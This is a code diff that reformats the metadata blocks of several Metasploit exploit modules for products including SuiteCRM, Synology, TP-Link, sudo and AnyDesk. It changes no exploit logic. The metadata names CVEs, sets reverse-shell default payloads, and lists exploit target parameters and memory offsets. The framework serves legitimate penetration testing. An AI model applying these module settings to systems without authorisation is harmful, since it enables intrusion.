+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
         'DefaultOptions' => {
           'SSL' => true,
           'RPORT' => 443

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -26,21 +26,18 @@ class MetasploitModule < Msf::Exploit::Remote
           name. This exploit will work on those versions as well, and those references are included.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'M. Cory Billington' # @_th3y
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-28328'], # First CVE
-            ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
-            ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
-            ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
-          ],
+        'Author' => [
+          'M. Cory Billington' # @_th3y
+        ],
+        'References' => [
+          ['CVE', '2020-28328'], # First CVE
+          ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
+          ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
+          ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
+        ],
         'Platform' => %w[linux unix],
         'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Linux (x64)', {
               'Arch' => ARCH_X64,
@@ -60,8 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -31,26 +31,23 @@ class MetasploitModule < Msf::Exploit::Remote
           to /b.  From there the payload is executed.  A wfsdelay is required to give time
           for the payload to download, and the execution of it to run.
         },
-        'Author' =>
-          [
-            'Nigusu Kassahun', # Discovery
-            'h00die' # metasploit module
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2017-15889' ],
-            [ 'EDB', '43190' ],
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
-            [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
-          ],
+        'Author' => [
+          'Nigusu Kassahun', # Discovery
+          'h00die' # metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2017-15889' ],
+          [ 'EDB', '43190' ],
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
+          [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
+        ],
         'Privileged' => true,
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Platform' => ['python'],
         'Arch' => [ARCH_PYTHON],
-        'Targets' =>
-          [
-            ['Automatic', {}]
-          ],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'PrependMigrate' => true,

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -30,8 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'],
         'License' => MSF_LICENSE,
-        'References' =>
-        [
+        'References' => [
           [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],
           [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ],
@@ -40,8 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2020-04-29',
         'Platform' => 'linux',
         'Arch' => ARCH_MIPSLE,
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'TP-Link NC200, NC220, NC230, NC250',
             {

--- a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
@@ -34,44 +34,39 @@ class MetasploitModule < Msf::Exploit::Remote
           Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-8604'],
-            ['CVE', '2020-8605'],
-            ['CVE', '2020-8606'],
-            ['ZDI', '20-676'],
-            ['ZDI', '20-677'],
-            ['ZDI', '20-678']
-          ],
+        'Author' => [
+          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
+        ],
+        'References' => [
+          ['CVE', '2020-8604'],
+          ['CVE', '2020-8605'],
+          ['CVE', '2020-8606'],
+          ['ZDI', '20-676'],
+          ['ZDI', '20-677'],
+          ['ZDI', '20-678']
+        ],
         'Privileged' => true,
-        'DefaultOptions' =>
+        'DefaultOptions' => {
+          'SSL' => true,
+          'payload' => 'python/meterpreter/reverse_tcp',
+          'WfsDelay' => 30
+        },
+        'Payload' => {
+          'Compat' =>
           {
-            'SSL' => true,
-            'payload' => 'python/meterpreter/reverse_tcp',
-            'WfsDelay' => 30
-          },
-        'Payload' =>
-          {
-            'Compat' =>
-            {
-              'ConnectionType' => '-bind'
-            }
-          },
+            'ConnectionType' => '-bind'
+          }
+        },
         'Platform' => ['python'],
         'Arch' => ARCH_PYTHON,
         'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2020-06-10',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'Reliability' => [REPEATABLE_SESSION],
-            'SideEffects' => [IOC_IN_LOGS]
-          }
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
       )
     )
 

--- a/modules/exploits/linux/http/unraid_auth_bypass_exec.rb
+++ b/modules/exploits/linux/http/unraid_auth_bypass_exec.rb
@@ -19,25 +19,22 @@ class MetasploitModule < Msf::Exploit::Remote
           interface, and an insecure use of the extract PHP function can be abused
           for arbitrary code execution as root.
         },
-        'Author' =>
-          [
-            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2020-5847' ],
-            [ 'CVE', '2020-5849' ],
-            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
-            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
-          ],
+        'Author' => [
+          'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
+        ],
+        'References' => [
+          [ 'CVE', '2020-5847' ],
+          [ 'CVE', '2020-5849' ],
+          [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+          [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+        ],
         'License' => MSF_LICENSE,
         'Platform' => ['php'],
         'Privileged' => true,
         'Arch' => ARCH_PHP,
-        'Targets' =>
-          [
-            [ 'Automatic', {}]
-          ],
+        'Targets' => [
+          [ 'Automatic', {}]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-02-10'
       )

--- a/modules/exploits/linux/http/vestacp_exec.rb
+++ b/modules/exploits/linux/http/vestacp_exec.rb
@@ -21,33 +21,29 @@ class MetasploitModule < Msf::Exploit::Remote
           bash script file in Vesta Control Panel to gain remote code execution as the root user.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
-          ],
-        'References' =>
-          [
-            ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
-            ['CVE', '2020-10808']
-          ],
-        'DefaultOptions' =>
-          {
-            'SSL' => true,
-            'WfsDelay' => 300,
-            'Payload' => 'python/meterpreter/reverse_tcp'
-          },
+        'Author' => [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+        'References' => [
+          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
+          ['CVE', '2020-10808']
+        ],
+        'DefaultOptions' => {
+          'SSL' => true,
+          'WfsDelay' => 300,
+          'Payload' => 'python/meterpreter/reverse_tcp'
+        },
         'Platform' => ['python'],
         'Arch' => ARCH_PYTHON,
         'Targets' => [[ 'Automatic', {}]],
         'Privileged' => true,
         'DisclosureDate' => '2020-03-17',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE, ],
-            'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
-            'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK,	]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
+          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK,	]
+        }
       )
     )
 

--- a/modules/exploits/linux/local/hp_xglance_priv_esc.rb
+++ b/modules/exploits/linux/local/hp_xglance_priv_esc.rb
@@ -28,33 +28,30 @@ class MetasploitModule < Msf::Exploit::Local
           escalation of privileges to root.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Tim Brown', # original finding
-            'Robert Jaroszuk', # exploit
-            'Marco Ortisi', # exploit
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Tim Brown', # original finding
+          'Robert Jaroszuk', # exploit
+          'Marco Ortisi', # exploit
+        ],
         'Platform' => [ 'linux' ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
-        'Targets' =>
-          [
-            [ 'Automatic', {} ],
-            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
-            [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
-          ],
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+        ],
         'Privileged' => true,
-        'References' =>
-          [
-            [ 'EDB', '48000' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
-            [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
-            [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
-            [ 'PACKETSTORM', '156206' ],
-            [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
-            [ 'CVE', '2014-2630' ]
-          ],
+        'References' => [
+          [ 'EDB', '48000' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
+          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
+          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
+          [ 'PACKETSTORM', '156206' ],
+          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
+          [ 'CVE', '2014-2630' ]
+        ],
         'DisclosureDate' => '2014-11-19',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/linux/local/pihole_remove_commands_lpe.rb
+++ b/modules/exploits/linux/local/pihole_remove_commands_lpe.rb
@@ -29,26 +29,23 @@ class MetasploitModule < Msf::Exploit::Local
           sudoers.d/pihole file with no password.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis
+        ],
         'Platform' => [ 'unix', 'linux' ],
         'Arch' => [ ARCH_CMD ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' },
-        'Payload' =>
-          {
-            'BadChars' => "\x27" # '
-          },
+        'Payload' => {
+          'BadChars' => "\x27" # '
+        },
         'Privileged' => true,
-        'References' =>
-          [
-            [ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ],
-            [ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ],
-            [ 'CVE', '2021-29449' ]
-          ],
+        'References' => [
+          [ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ],
+          [ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ],
+          [ 'CVE', '2021-29449' ]
+        ],
         'DisclosureDate' => '2021-04-20',
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -31,12 +31,11 @@ class MetasploitModule < Msf::Exploit::Local
           is then leveraged to execute a payload with root privileges.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Kevin Backhouse',                   # vulnerability discovery and analysis
-            'Spencer McIntyre',                  # metasploit module
-            'jheysel-r7'                         # metasploit module
-          ],
+        'Author' => [
+          'Kevin Backhouse', # vulnerability discovery and analysis
+          'Spencer McIntyre',                  # metasploit module
+          'jheysel-r7'                         # metasploit module
+        ],
         'SessionTypes' => ['shell', 'meterpreter'],
         'Platform' => ['unix', 'linux'],
         'References' => [
@@ -44,10 +43,9 @@ class MetasploitModule < Msf::Exploit::Local
           ['CVE', '2021-3560'],
           ['EDB', '50011']
         ],
-        'Targets' =>
-          [
-            [ 'Automatic', {} ],
-          ],
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2021-06-03',
         'Notes' => {

--- a/modules/exploits/linux/local/sudo_baron_samedit.rb
+++ b/modules/exploits/linux/local/sudo_baron_samedit.rb
@@ -29,16 +29,15 @@ class MetasploitModule < Msf::Exploit::Local
           controlled library which results in it being loaded with the elevated privileges held by sudo.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Qualys',                            # vulnerability discovery and analysis
-            'Spencer McIntyre',                  # metasploit module
-            'bwatters-r7',                       # metasploit module
-            'smashery',                          # metasploit module
-            'blasty <blasty@fail0verflow.com>',  # original PoC
-            'worawit',                           # original PoC
-            'Alexander Krog'                     # detailed vulnerability analysis and exploit technique
-          ],
+        'Author' => [
+          'Qualys', # vulnerability discovery and analysis
+          'Spencer McIntyre',                  # metasploit module
+          'bwatters-r7',                       # metasploit module
+          'smashery',                          # metasploit module
+          'blasty <blasty@fail0verflow.com>',  # original PoC
+          'worawit',                           # original PoC
+          'Alexander Krog'                     # detailed vulnerability analysis and exploit technique
+        ],
         'SessionTypes' => ['shell', 'meterpreter'],
         'Platform' => ['unix', 'linux'],
         'References' => [
@@ -48,28 +47,27 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'],
           ['CVE', '2021-3156'],
         ],
-        'Targets' =>
-          [
-            [ 'Automatic', {} ],
-            [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 20\.04/ } ],
-            [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 20\.04/ } ],
-            [ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 19\.04/ } ],
-            [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 18\.04/ } ],
-            [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 18\.04/ } ],
-            [ 'Ubuntu 16.04 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'nss_u16', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 16\.04/ } ],
-            [ 'Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)', { exploit_script: 'nss_u14', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 14\.04/ } ],
-            [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { exploit_script: 'nss_generic1', exploit_params: [ 64, 49, 60, 214 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
-            [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
-            [ 'CentOS 8 x64 (sudo v1.8.25p1, libc v2.28)', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^CentOS Linux release 8/ } ],
-            [ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17)', { exploit_script: 'userspec_c7', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
-            [ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17) - alternative', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
-            [ 'Fedora 27 x64 (sudo v1.8.21p2, libc v2.26)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 27/ } ],
-            [ 'Fedora 26 x64 (sudo v1.8.20p2, libc v2.25)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 26/ } ],
-            [ 'Fedora 25 x64 (sudo v1.8.18, libc v2.24)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 25/ } ],
-            [ 'Fedora 24 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 24/ } ],
-            [ 'Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 23/ } ],
-            [ 'Manual', { exploit_script: 'nss_generic1', exploit_technique: 'nss', lib_needs_space: true } ],
-          ],
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 20\.04/ } ],
+          [ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 20\.04/ } ],
+          [ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 19\.04/ } ],
+          [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 18\.04/ } ],
+          [ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 18\.04/ } ],
+          [ 'Ubuntu 16.04 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'nss_u16', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 16\.04/ } ],
+          [ 'Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)', { exploit_script: 'nss_u14', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 14\.04/ } ],
+          [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { exploit_script: 'nss_generic1', exploit_params: [ 64, 49, 60, 214 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
+          [ 'Debian 10 x64 (sudo v1.8.27, libc v2.28) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
+          [ 'CentOS 8 x64 (sudo v1.8.25p1, libc v2.28)', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^CentOS Linux release 8/ } ],
+          [ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17)', { exploit_script: 'userspec_c7', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
+          [ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17) - alternative', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
+          [ 'Fedora 27 x64 (sudo v1.8.21p2, libc v2.26)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 27/ } ],
+          [ 'Fedora 26 x64 (sudo v1.8.20p2, libc v2.25)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 26/ } ],
+          [ 'Fedora 25 x64 (sudo v1.8.18, libc v2.24)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 25/ } ],
+          [ 'Fedora 24 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 24/ } ],
+          [ 'Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 23/ } ],
+          [ 'Manual', { exploit_script: 'nss_generic1', exploit_technique: 'nss', lib_needs_space: true } ],
+        ],
         'DefaultTarget' => 0,
         'Arch' => ARCH_X64,
         'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 },

--- a/modules/exploits/linux/misc/aerospike_database_udf_cmd_exec.rb
+++ b/modules/exploits/linux/misc/aerospike_database_udf_cmd_exec.rb
@@ -34,24 +34,21 @@ class MetasploitModule < Msf::Exploit::Remote
           4.9.0.5, 4.9.0.11 and 5.0.0.10.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'b4ny4n', # Discovery and exploit
-            'bcoles' # Metasploit
-          ],
-        'References' =>
-          [
-            ['EDB', '49067'],
-            ['CVE', '2020-13151'],
-            ['PACKETSTORM', '160106'],
-            ['URL', 'https://www.aerospike.com/enterprise/download/server/notes.html#5.1.0.3'],
-            ['URL', 'https://github.com/b4ny4n/CVE-2020-13151'],
-            ['URL', 'https://b4ny4n.github.io/network-pentest/2020/08/01/cve-2020-13151-poc-aerospike.html'],
-            ['URL', 'https://www.aerospike.com/docs/operations/manage/udfs/'],
-          ],
+        'Author' => [
+          'b4ny4n', # Discovery and exploit
+          'bcoles' # Metasploit
+        ],
+        'References' => [
+          ['EDB', '49067'],
+          ['CVE', '2020-13151'],
+          ['PACKETSTORM', '160106'],
+          ['URL', 'https://www.aerospike.com/enterprise/download/server/notes.html#5.1.0.3'],
+          ['URL', 'https://github.com/b4ny4n/CVE-2020-13151'],
+          ['URL', 'https://b4ny4n.github.io/network-pentest/2020/08/01/cve-2020-13151-poc-aerospike.html'],
+          ['URL', 'https://www.aerospike.com/docs/operations/manage/udfs/'],
+        ],
         'Platform' => %w[linux unix],
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Unix Command',
             {
@@ -73,12 +70,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'DisclosureDate' => '2020-07-31',
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
         'DefaultTarget' => 0
       )
     )

--- a/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
+++ b/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
@@ -25,11 +25,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'Spencer McIntyre' # metasploit module
         ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'CVE', '2020-13160' ],
-            [ 'URL', 'https://devel0pment.de/?p=1881' ]
-          ],
+        'References' => [
+          [ 'CVE', '2020-13160' ],
+          [ 'URL', 'https://devel0pment.de/?p=1881' ]
+        ],
         'Payload' => {
           'Space' => 512,
           'BadChars' => "\x00\x25\x26"
@@ -46,17 +45,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'SideEffects' => [ SCREEN_EFFECTS ],
           'Reliability' => [ UNRELIABLE_SESSION ]
         },
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Anydesk 5.5.2 Ubuntu 20.04 x64',
-              { 'stkref1' => 109, 'stkref2' => 125, 'time@got.plt' => 0x119ddc0 - 139 }
-            ],
-            [
-              'Anydesk 5.5.2 Ubuntu 18.04 x64',
-              { 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
-            ]
+            'Anydesk 5.5.2 Ubuntu 20.04 x64',
+            { 'stkref1' => 109, 'stkref2' => 125, 'time@got.plt' => 0x119ddc0 - 139 }
           ],
+          [
+            'Anydesk 5.5.2 Ubuntu 18.04 x64',
+            { 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
+          ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-06-16'
       )

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -31,40 +31,36 @@ class MetasploitModule < Msf::Exploit::Remote
           201030 are exploitable.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
           'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
-            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2020/minesweeper.md'],
-            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2020/minesweeper.md'],
-            [ 'CVE', '2020-10882'],
-            [ 'CVE', '2020-10883'],
-            [ 'CVE', '2020-10884'],
-            [ 'CVE', '2020-28347'],
-            [ 'ZDI', '20-334'],
-            [ 'ZDI', '20-335'],
-            [ 'ZDI', '20-336' ]
-          ],
+        'References' => [
+          [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
+          [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2020/minesweeper.md'],
+          [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2020/minesweeper.md'],
+          [ 'CVE', '2020-10882'],
+          [ 'CVE', '2020-10883'],
+          [ 'CVE', '2020-10884'],
+          [ 'CVE', '2020-28347'],
+          [ 'ZDI', '20-334'],
+          [ 'ZDI', '20-335'],
+          [ 'ZDI', '20-336' ]
